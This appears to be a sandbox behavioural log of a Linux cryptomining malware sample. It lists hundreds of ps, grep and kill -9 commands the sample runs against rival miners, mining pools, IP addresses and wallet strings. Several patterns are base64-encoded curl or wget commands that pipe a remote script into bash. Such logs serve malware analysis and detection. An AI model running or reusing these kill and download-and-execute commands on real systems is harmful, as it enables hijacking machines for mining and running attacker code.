/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep netdns2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep watchdogs2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v atd2⤵
-
-
/bin/grepgrep -v apache22⤵
-
-
/usr/bin/awkawk "\$3>80.0{print \$2}"2⤵
-
-
/bin/grepgrep -v dblaunched2⤵
-
-
/bin/grepgrep -v salt-minions2⤵
-
-
/bin/grepgrep -v dblaunchs2⤵
-
-
/bin/grepgrep -v dblaunch2⤵
-
-
/bin/grepgrep -v root2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep " ps"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v aux2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/bin/grepgrep sync_supers2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/cutcut -c 9-152⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/cutcut -c 9-152⤵
-
-
/bin/grepgrep cpuset2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep "x]"2⤵
-
-
/bin/grepgrep -v aux2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep "sh] <"2⤵
-
-
/bin/grepgrep -v aux2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep " \\[]"2⤵
-
-
/bin/grepgrep -v aux2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep /tmp/l.sh2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep /tmp/zmcat2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep hahwNEdB2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep CnzFVPLF2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep CvKzzZLs2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep aziplcr72qjhzvin2⤵
- System Network Configuration Discovery
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep /tmp/udevd2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep sustse2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep sustse32⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep wget2⤵
-
-
/bin/grepgrep mr.sh2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep curl2⤵
-
-
/bin/grepgrep mr.sh2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep wget2⤵
-
-
/bin/grepgrep 2mr.sh2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep curl2⤵
-
-
/bin/grepgrep 2mr.sh2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep wget2⤵
-
-
/bin/grepgrep cr5.sh2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep curl2⤵
-
-
/bin/grepgrep cr5.sh2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep wget2⤵
-
-
/bin/grepgrep logo9.jpg2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep curl2⤵
-
-
/bin/grepgrep logo9.jpg2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep j2.conf2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep wget2⤵
-
-
/bin/grepgrep luk-cpu2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep curl2⤵
-
-
/bin/grepgrep luk-cpu2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep wget2⤵
-
-
/bin/grepgrep ficov2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep curl2⤵
-
-
/bin/grepgrep ficov2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep wget2⤵
-
-
/bin/grepgrep he.sh2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep curl2⤵
-
-
/bin/grepgrep he.sh2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep wget2⤵
-
-
/bin/grepgrep miner.sh2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep curl2⤵
-
-
/bin/grepgrep miner.sh2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep wget2⤵
-
-
/bin/grepgrep nullcrew2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep curl2⤵
-
-
/bin/grepgrep nullcrew2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 107.174.47.1562⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 83.220.169.2472⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 51.38.203.1462⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 144.217.45.452⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 107.174.47.1812⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 176.31.6.162⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep mine.moneropool.com2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps auxf2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep pool.t00ls.ru2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps auxf2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep xmr.crypto-pool.fr:80802⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps auxf2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep xmr.crypto-pool.fr:33332⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps auxf2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grep
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps auxf2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep monerohash.com2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps auxf2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep /tmp/a7b104c2702⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps auxf2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep xmr.crypto-pool.fr:66662⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps auxf2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep xmr.crypto-pool.fr:77772⤵
-
-
/bin/psps auxf2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/grepgrep xmr.crypto-pool.fr:4432⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps auxf2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep stratum.f2pool.com:88882⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps auxf2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep xmrpool.eu2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps auxf2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/usr/local/sbin/killkill -9 16353⤵
-
-
/usr/local/bin/killkill -9 16353⤵
-
-
/usr/sbin/killkill -9 16353⤵
-
-
/usr/bin/killkill -9 16353⤵
-
-
/sbin/killkill -9 16353⤵
-
-
/bin/killkill -9 16353⤵
-
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep xiaoyao2⤵
-
-
/bin/psps auxf2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/usr/local/sbin/killkill -9 16403⤵
-
-
/usr/local/bin/killkill -9 16403⤵
-
-
/usr/sbin/killkill -9 16403⤵
-
-
/usr/bin/killkill -9 16403⤵
-
-
/sbin/killkill -9 16403⤵
-
-
/bin/killkill -9 16403⤵
-
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep xiaoxue2⤵
-
-
/bin/psps auxf2⤵
-
-
/bin/sedsed -e "s/\\/.*//g"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep "ESTABLISHED\\|SYN_SENT"2⤵
-
-
/bin/grepgrep 46.243.253.152⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/sedsed -e "s/\\/.*//g"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep "ESTABLISHED\\|SYN_SENT"2⤵
-
-
/bin/grepgrep 176.31.6.162⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/sedsed -e "s/\\/.*//g"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep "ESTABLISHED\\|SYN_SENT"2⤵
-
-
/bin/grepgrep 108.174.197.762⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/sedsed -e "s/\\/.*//g"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep "ESTABLISHED\\|SYN_SENT"2⤵
-
-
/bin/grepgrep 192.236.161.62⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/sedsed -e "s/\\/.*//g"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep "ESTABLISHED\\|SYN_SENT"2⤵
-
-
/bin/grepgrep 88.99.242.922⤵
-
-
/usr/bin/pkillpkill -f pastebin2⤵
-
-
/usr/bin/pkillpkill -f 185.193.127.1152⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f monerohash2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f L2Jpbi9iYXN2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f xzpauectgr2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f slxfbkmxtd2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f mixtape2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f addnj2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f 200.68.17.1962⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f IyEvYmluL3NoCgpzUG2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f KHdnZXQgLXFPLSBodHRw2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f FEQ3eSp8omko5nx9e97hQ39NS3NMo6rxVQS32⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f Y3VybCAxOTEuMTAxLjE4MC43Ni9saW4udHh0IHxzaAo2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f mwyumwdbpq.conf2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f honvbsasbf.conf2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f mqdsflm.cf2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f stratum2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f lower.sh2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ./ppp2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f cryptonight2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ./seervceaess2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f ./servceaess2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ./servceas2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ./servcesa2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ./vsp2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f ./jvs2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f ./pvv2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ./vpp2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ./pces2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ./rspce2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ./haveged2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ./jiba2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ./watchbog2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ./A7mA5gb2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f kacpi_svc2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f kswap_svc2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f kauditd_svc2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f kpsmoused_svc2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f kseriod_svc2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f kthreadd_svc2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ksoftirqd_svc2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f kintegrityd_svc2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f jawa2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f oracle.jpg2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f 45cToD1FzkjAxHRBhYKKLg5utMGEN2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f 188.209.49.542⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f 181.214.87.2412⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f etnkFgkKMumdqhrqxZ6729U7bY8pzRjYzGbXa5sDQ2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f 47TdedDgSXjZtJguKmYqha4sSrTvoPXnrYQEq2Lbj2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f etnkP9UjR55j9TKyiiXWiRELxTS51FjU9e1UapXyK2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f servim2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f kblockd_svc2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f native_svc2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f ynn2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f 65ccEJ72⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f jmxx2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f 2Ne80nA2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f sysstats2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f systemxlv2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f watchbog2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f OIcJi1m2⤵
-
-
/usr/bin/pkillpkill -f biosetjenkins2⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f Loopback2⤵
-
-
/usr/bin/pkillpkill -f apaceha2⤵
-
-
/usr/bin/pkillpkill -f cryptonight2⤵
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f stratum2⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f mixnerdx2⤵
-
-
/usr/bin/pkillpkill -f performedl2⤵
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f JnKihGjn2⤵
- Reads CPU attributes
-
-
